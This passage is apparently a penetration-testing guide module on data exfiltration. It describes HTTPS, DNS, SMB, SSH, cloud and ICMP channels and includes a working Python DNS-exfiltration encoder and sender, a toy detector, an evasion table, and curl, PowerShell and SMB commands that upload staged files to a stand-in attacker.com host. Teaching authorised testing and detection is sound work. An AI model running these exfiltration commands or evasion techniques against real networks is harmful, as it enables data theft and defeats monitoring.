11 - Data Exfiltration

#Overview

Data exfiltration is the phase where sensitive information is extracted from the target environment to demonstrate business impact. In a penetration test, the goal is not to actually steal data but to prove that data theft is possible -- typically by exfiltrating a small, non-sensitive flag file or screenshot as proof of concept.

This phase validates the risk rating of the findings that led to compromise. A low-privileged web shell is a Medium finding. That same web shell leading to extraction of the customer database is a Critical finding. The difference is data exfiltration.

#When to Exfiltrate

Exfiltration is the final proof-of-impact phase. It typically occurs:

  • After you have accessed a high-value target (database server, file server, domain controller)
  • When you need to demonstrate the impact of a privilege escalation or lateral movement chain
  • As the culminating evidence for the executive summary of the report
  • Before beginning cleanup and report writing

#Exfiltration Methods

#HTTPS Exfiltration (Preferred)

  • Why: Blends with normal web traffic. Encrypted in transit. Outbound 443 is almost never blocked.
  • How: Upload to an attacker-controlled web server via curl, wget --post-file, or Invoke-WebRequest
  • OPSEC: Use a legitimate-looking domain with a valid TLS certificate; newly registered or uncategorized domains are exactly what web proxies and reputation feeds flag. Carry the payload in a POST body rather than a GET query string: URLs are written to proxy logs and are length-limited, request bodies are neither. If the client runs a TLS-intercepting proxy, the body is inspected in the clear, so encrypt the payload itself as well (see OPSEC Considerations).

#DNS Exfiltration

  • Why: DNS queries almost always leave the network: the internal resolver forwards them recursively until they reach the authoritative server for your domain, which you control. Often unmonitored.
  • How: Encode data into the subdomain labels of queries for a zone you control (e.g., <chunk>.attacker.com) and read it back from the authoritative server's query log. Use base32 or hex rather than base64: resolvers fold case, labels may only contain [a-z0-9-], each label is at most 63 characters and the whole name at most 253.
  • Limitations: Slow (on the order of 100 bytes of payload per query), requires chunking and sequence numbers for reassembly, detectable by DNS security products (many distinct long subdomains under one zone, high query rate, bursts of NXDOMAIN)
  • Tools: dnscat2, iodine, custom Python scripts
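The encoding and reassembly described above, as an added example that is not part of this module and is not dnscat2 or iodine: it turns a byte string into a sequence of query names under an assumed zone exfil.example.com (replace with a zone whose authoritative server you run), issues them through the target's configured resolver with random jitter, and on the receiving side (where the input would be the authoritative server's query log) reassembles them in any order and verifies a trailer carrying the chunk count and a truncated SHA-256. The sample payload is constructed; the 63/253 limits are the DNS name limits.

```python
import base64
import hashlib
import random
import socket
import time

DOMAIN = "exfil.example.com"   # assumed: a zone whose authoritative name server you run
MAX_LABEL = 63                  # RFC 1035: one label is at most 63 octets
MAX_NAME = 253                  # practical limit for a full name (255 on the wire)
LABELS_PER_QUERY = 3            # 3 * 63 = 189 base32 chars, about 118 payload bytes per query


def encode_queries(data: bytes, domain: str = DOMAIN,
                   labels_per_query: int = LABELS_PER_QUERY) -> list[str]:
    """Turn data into names of the form <seq>.<b32>.<b32>.<b32>.<domain>, plus a trailer.

    base32, not base64: resolvers fold case and labels may only contain [a-z0-9-],
    so base64's '+', '/', '=' and mixed case would be mangled or refused.
    """
    enc = base64.b32encode(data).decode("ascii").rstrip("=").lower()
    per_query = MAX_LABEL * labels_per_query
    names = []
    for seq, start in enumerate(range(0, len(enc), per_query)):
        chunk = enc[start:start + per_query]
        labels = [chunk[i:i + MAX_LABEL] for i in range(0, len(chunk), MAX_LABEL)]
        name = ".".join([f"{seq:04x}", *labels, domain])
        if len(name) > MAX_NAME:
            raise ValueError(f"name too long ({len(name)}); lower labels_per_query")
        names.append(name)
    # Trailer: chunk count and truncated SHA-256, so the receiver can tell a
    # complete, intact transfer from one with dropped or mangled queries.
    digest = hashlib.sha256(data).hexdigest()[:16]
    names.append(".".join(["end", f"{len(names):04x}", digest, domain]))
    return names


def send_queries(names: list[str], resolve=None, min_delay: float = 0.5,
                 max_delay: float = 2.0) -> int:
    """Issue the queries one at a time with random jitter (the rate-limiting OPSEC step).

    Every lookup is expected to fail with NXDOMAIN; the data has already reached
    the authoritative server by the time the answer comes back.
    """
    if resolve is None:
        def resolve(name: str) -> None:
            try:
                socket.gethostbyname(name)
            except socket.gaierror:
                pass
    for name in names:
        resolve(name)
        time.sleep(random.uniform(min_delay, max_delay))
    return len(names)


def decode_queries(names: list[str], domain: str = DOMAIN) -> bytes:
    """Receiver side: reassemble from the authoritative server's query log.

    Arrival order does not matter (retries and reordering are normal) and names
    under the zone that do not fit the format are skipped.
    """
    chunks: dict[int, str] = {}
    expected = digest = None
    for name in names:
        if not name.lower().endswith("." + domain):
            continue                                   # some other zone entirely
        labels = name.lower()[: -len(domain) - 1].split(".")
        try:
            if labels[0] == "end" and len(labels) == 3:
                expected, digest = int(labels[1], 16), labels[2]
            else:
                chunks[int(labels[0], 16)] = "".join(labels[1:])
        except ValueError:
            continue                                   # e.g. www.<zone> from a scanner
    if expected is None or any(i not in chunks for i in range(expected)):
        raise ValueError(f"incomplete transfer: {len(chunks)} chunks, trailer says {expected}")
    enc = "".join(chunks[i] for i in range(expected)).upper()
    data = base64.b32decode(enc + "=" * (-len(enc) % 8))   # restore stripped padding
    if hashlib.sha256(data).hexdigest()[:16] != digest:
        raise ValueError("digest mismatch: payload corrupted in transit")
    return data


if __name__ == "__main__":
    payload = b"flag{constructed-poc-only}\n" * 20     # constructed sample, not client data
    queries = encode_queries(payload)
    print(f"{len(payload)} bytes -> {len(queries)} queries, e.g. {queries[0]}")
    sent: list[str] = []
    send_queries(queries, resolve=sent.append, min_delay=0, max_delay=0)  # capture, don't resolve
    random.shuffle(sent)                                                   # arrival order varies
    assert decode_queries(sent) == payload
    print("round trip OK")
```

With the default resolver the queries go wherever the host's resolver configuration sends them, which is the point: only the authoritative server for the zone ever sees the payload, and the client only ever sees NXDOMAIN. A 540-byte flag file becomes six queries; a 1 MB file would be about 9,000, which is why the module says to demonstrate the path, not the volume.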

#SMB / File Share Exfiltration

  • Why: Fast for large files. Blends with internal file share traffic.
  • How: Stage data on an internal host or share, then copy it to an SMB share served from your attacker box (or mount that share from the target and push to it). Impacket's smbserver.py is the standard tool.
  • Limitation: TCP 445 outbound is blocked at almost every perimeter, so this works for an attacker host on the internal network or reachable through a pivot, not across the internet.

#SSH / SCP / SFTP

  • Why: Encrypted, commonly allowed outbound, native on Linux
  • How: scp file user@attacker-ip:/path, sftp, or ssh user@attacker-ip "cat > file" < localfile
  • OPSEC: Outbound SSH may be monitored. Use a non-standard port or tunnel through HTTPS.

#Cloud Service Exfiltration

  • Why: Blends with legitimate cloud traffic (AWS S3, Azure Blob, Google Drive, Dropbox)
  • How: Upload data using cloud CLI tools or API calls. Requires credentials for the receiving account: a bucket or tenant you own, never one belonging to the client unless that is explicitly in scope.
  • OPSEC: Very hard to distinguish from normal business operations, unless the proxy or CASB enforces tenant restrictions for that service, in which case uploads to a foreign tenant are blocked or alerted on.

#ICMP / Covert Channels

  • Why: Works when all other outbound protocols are blocked
  • How: Tunneling data through ICMP echo request/reply packets
  • Limitations: Very slow, highly unusual if monitored, easily rate-limited
  • Tools: ptunnel, icmpsh, custom scapy scripts

#Physical / Sneakernet

  • Why: For air-gapped networks where no outbound connectivity exists
  • How: Write data to USB, print to PDF/paper, encode in QR codes, audio exfiltration
  • Context: Rarely in scope for network pentests; more relevant for physical security assessments

#OPSEC Considerations

  • Data volume matters: Exfiltrating 10GB will trigger alarms. Exfiltrating 100KB of critical data may not. Demonstrate the path, not the volume.
  • Timing: Exfiltrate during peak business hours when traffic volume masks your activity. Do not exfiltrate at 3 AM when network traffic is a trickle.
  • Protocol choice: HTTPS POST to a legitimate-looking domain is the gold standard for stealth.
  • Encryption: Always encrypt exfiltrated data in transit (HTTPS, SSH) and at rest on your server. The data must be protected even if your server is compromised.
  • Staging: Stage data on an intermediate internal host before exfiltration. Do not exfiltrate directly from the high-value target.
  • Log evidence: Record what you exfiltrated as proof-of-concept: file name, size, SHA-256, source host, channel used, and timestamp. This is critical for the report.
  • Cleanup: Delete staging files from internal hosts during the cleanup phase.

#Detection Avoidance

| Detection Mechanism | Evasion Technique |
| --- | --- |
| DLP (Data Loss Prevention) | Encrypt data before exfiltration; chunk into smaller pieces |
| Network flow analysis | Exfiltrate during peak hours; use common protocols (HTTPS) |
| DNS monitoring | Limit query rate and add random delays; keep subdomains short and few per zone; TXT responses carry more data downstream than A records, but an unusual TXT volume is itself a signal |
| Proxy / content filtering | Use allowed services (Office 365, Google Drive); avoid known-bad, newly registered or uncategorized domains |
| EDR file access monitoring | Access files with native tools; avoid mimikatz-like memory scraping |
| Volume-based alerts | Limit exfiltration to small, targeted data; demonstrate path not volume |
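To show what the DNS monitoring row is actually keying on, here is an added example that is not from this module or from any product: a toy detector over a constructed resolver log. It groups queries per client, zone and minute, flags buckets with many distinct subdomains whose longest label is long (reporting the label entropy alongside), and then re-times the exfil client's queries to one every ten minutes to show why the rate-limiting advice works against a per-minute window. The timestamps, client addresses, query names and the zone exfil.example.com are all constructed.

```python
import math
from collections import defaultdict

# Constructed resolver log, "<epoch> <client> <qtype> <qname>": one workstation doing
# ordinary lookups and one pushing base32-looking chunks under a zone it does not own.
SAMPLE_LOG = """\
1700000000 10.1.1.20 A www.example.com
1700000002 10.1.1.20 A login.microsoftonline.com
1700000004 10.1.1.20 A d2h3lk5x9v.cloudfront.net
1700000006 10.1.1.20 A outlook.office365.com
1700000008 10.1.1.20 A www.example.com
1700000010 10.1.1.20 A cdn.jsdelivr.net
1700000001 10.1.1.37 A 0000.mfrgg43ugu4tmmzrmnqwkzldmjxge2lfhe4dqmbxgy2deobv.exfil.example.com
1700000002 10.1.1.37 A 0001.nrwxk3dtgiydcnrvgyzdonbvmjzxk2lkfa2tqnzwgeztkmrthe2a.exfil.example.com
1700000003 10.1.1.37 A 0002.haytkntggu2tkmjwgu3tsnrxmnsdsmrvhe4tqmjrguydezlxmj4dcmrx.exfil.example.com
1700000004 10.1.1.37 A 0003.kjzgeyldmjxgk2zamnqwy3dfmzsgkzjqomqwi2dnnrzgczlvovza.exfil.example.com
1700000005 10.1.1.37 A 0004.pfxgk4ramjzg653ogeydumbtjbxgsysxmvzxwztfn5wgi3tnmvrh.exfil.example.com
1700000006 10.1.1.37 A end.0005.9f86d081884c7d65.exfil.example.com
"""

MIN_UNIQUE = 5        # distinct subdomains per (client, zone) per minute before we care
MIN_LABEL_LEN = 30    # mean length of the longest label; real hostnames are far shorter


def parse_log(text):
    """One tuple per line: (epoch, client, qtype, qname)."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, qtype, qname = line.split()
        records.append((int(ts), client, qtype, qname.lower().rstrip(".")))
    return records


def shannon_entropy(s):
    """Bits per character; base32/hex payload labels sit near 4-5, hostnames lower."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for c in s:
        counts[c] += 1
    n = len(s)
    return -sum(k / n * math.log2(k / n) for k in counts.values())


def zone_of(qname):
    """Registrable zone, approximated as the last two labels (no public-suffix list here)."""
    return ".".join(qname.split(".")[-2:])


def detect(records, min_unique=MIN_UNIQUE, min_label_len=MIN_LABEL_LEN):
    """Group by (client, zone, minute) and flag buckets that look like chunked exfil."""
    buckets = defaultdict(list)
    for ts, client, _qtype, qname in records:
        buckets[(client, zone_of(qname), ts // 60)].append(qname)
    alerts = []
    for (client, zone, minute), names in buckets.items():
        subs = {n[: -len(zone) - 1] for n in names if len(n) > len(zone) + 1}
        if len(subs) < min_unique:
            continue
        longest = [max(s.split("."), key=len) for s in subs]
        mean_len = sum(map(len, longest)) / len(longest)
        if mean_len < min_label_len:
            continue
        alerts.append({
            "client": client, "zone": zone, "minute": minute * 60,
            "unique_subdomains": len(subs), "mean_label_len": round(mean_len, 1),
            "mean_entropy": round(sum(map(shannon_entropy, longest)) / len(longest), 2),
        })
    return alerts


def spread_out(records, client, gap):
    """Re-time one client's queries gap seconds apart: what rate-limiting looks like in the log."""
    out, i = [], 0
    for ts, c, qtype, qname in records:
        if c == client:
            out.append((ts + i * gap, c, qtype, qname))
            i += 1
        else:
            out.append((ts, c, qtype, qname))
    return out


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    for alert in detect(recs):
        print("ALERT", alert)
    print("after spreading to one query per 10 min:", detect(spread_out(recs, "10.1.1.37", 600)))
```

Spreading the queries out defeats this toy's one-minute window; a product that also counts distinct subdomains per zone per day, NXDOMAIN ratios or response sizes would still see the transfer, so the slow channel should carry a small proof-of-concept file, not a dataset.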

#What's in This Section

| File | Covers |
| --- | --- |
| exfiltration-techniques.md | All exfiltration methods in detail: HTTPS via curl/PowerShell, DNS tunneling setup (dnscat2/iodine), SMB staging and pull, SSH/SCP transfer, cloud service API exfiltration, ICMP tunneling, encoding and compression strategies, staging directory management, proof-of-concept file creation |

#Cross-References

  • 10-persistence -- Persistence may provide the stable access needed for staged exfiltration
  • 12-reporting-cleanup -- Clean up staging files and close exfiltration channels during cleanup

#Quick Reference: Exfiltration Commands

```bash
# HTTPS POST (Linux): multipart/form-data upload of a staged archive
curl -F "file=@/tmp/staged_data.zip" https://attacker.com/upload

# HTTPS POST (Windows, PowerShell): sends the file as the raw request body,
# so the receiving handler must expect a bare body rather than a form field
Invoke-WebRequest -Uri https://attacker.com/upload -Method Post -InFile C:\temp\data.zip

# Impacket SMB server (on attacker): serves /tmp/exfil as \\<attacker-ip>\share
impacket-smbserver -smb2support share /tmp/exfil

# Copy to attacker SMB share (on target)
copy C:\temp\data.zip \\10.10.14.5\share\data.zip

# DNS exfiltration (setup listener): the dnscat2 server is Ruby, and must be
# reachable as the authoritative name server for the domain it is given
ruby dnscat2.rb --dns "domain=attacker.com"
```

#Key Principle